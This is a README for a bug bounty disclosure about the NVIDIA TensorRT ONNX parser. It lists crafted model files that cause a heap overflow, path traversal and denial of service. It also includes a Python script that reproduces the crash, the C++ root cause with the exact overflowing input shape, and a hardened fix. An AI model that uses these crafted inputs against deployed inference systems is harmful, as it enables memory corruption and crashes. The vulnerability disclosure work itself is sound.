TensorRT ONNX Parser - Security PoC Models

Bug bounty research submission to huntr.com targeting the NVIDIA TensorRT ONNX parser.

Vulnerabilities

| File | Vulnerability | CWE | Severity |
|------|---------------|-----|----------|
| eyelike_overflow.onnx | Integer overflow -> heap OOB write in EyeLike op | CWE-190, CWE-122 | Critical |
| eyelike_small_overflow.onnx | Same bug, faster crash trigger | CWE-190, CWE-122 | Critical |
| external_oom_length.onnx | Uncapped length field -> OOM denial of service | CWE-770 | High |
| external_abs_path.onnx | Absolute path traversal bypass in external weights | CWE-22 | Medium |
| external_neg_offset.onnx | Negative seek offset in external weights | CWE-20 | Medium |
| external_oob_offset.onnx | Read past EOF - uninitialized buffer risk | CWE-125 | Medium |

Reproduce (Finding 1 - Heap OOB Write)

```python
import tensorrt as trt

logger = trt.Logger(trt.Logger.VERBOSE)
builder = trt.Builder(logger)
network = builder.create_network(
    1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)

with open("eyelike_overflow.onnx", "rb") as f:
    parser.parse(f.read())
# Expected: SIGSEGV / heap-buffer-overflow
```

Root Cause (Finding 1)

```cpp
// onnxOpImporters.cpp - EyeLike importer
int totalWeights = dims.d[0] * dims.d[1];  // int32 overflow! dims are int64_t
std::vector<int> values(totalWeights);      // undersized allocation
for (int32_t r = 0; r < dims.d[0]; ++r)
    for (int32_t c = 0; c < dims.d[1]; ++c)
        values[r * dims.d[1] + c] = 0;     // OOB WRITE
```

Trigger: input shape [65537, 65536]

  • True product: 4,295,032,832 (overflows int32)
  • int32 truncated: 65,536 (vector too small)
  • First OOB write: r=1, c=0 -> index 65,536
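
A hardened form of the size computation above, as an added example that is not TensorRT's code or its actual fix. The names `checkedElemCount`, `makeEyeLike`, `truncatedCount` and the `kMaxElems` cap are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <limits>
#include <vector>

// Hypothetical cap on elements of a generated constant; not a TensorRT setting.
static const int64_t kMaxElems = int64_t(1) << 28;

// Computes rows * cols in 64 bits. Fails on a negative dimension, on
// int64_t overflow, or when the product exceeds the cap.
bool checkedElemCount(int64_t rows, int64_t cols, int64_t* out)
{
    if (rows < 0 || cols < 0)
        return false;
    if (rows != 0 && cols > std::numeric_limits<int64_t>::max() / rows)
        return false;
    int64_t total = rows * cols;
    if (total > kMaxElems)
        return false;
    *out = total;
    return true;
}

// Fills `values` with a rows x cols identity-like matrix, using 64-bit sizes
// and indices. Returns false and allocates nothing if the shape is rejected.
bool makeEyeLike(int64_t rows, int64_t cols, std::vector<int32_t>* values)
{
    values->clear();
    int64_t total = 0;
    if (!checkedElemCount(rows, cols, &total))
        return false;
    values->assign(static_cast<size_t>(total), 0);
    for (int64_t r = 0; r < rows && r < cols; ++r)
        (*values)[static_cast<size_t>(r * cols + r)] = 1;
    return true;
}

// For comparison: the value a 32-bit `int` receives from the same product.
int32_t truncatedCount(int64_t rows, int64_t cols)
{
    uint64_t wide = static_cast<uint64_t>(rows) * static_cast<uint64_t>(cols);
    return static_cast<int32_t>(static_cast<uint32_t>(wide));
}
```

With the trigger shape [65537, 65536], `truncatedCount` reproduces the 65,536-element allocation size, while `makeEyeLike` rejects the shape before allocating.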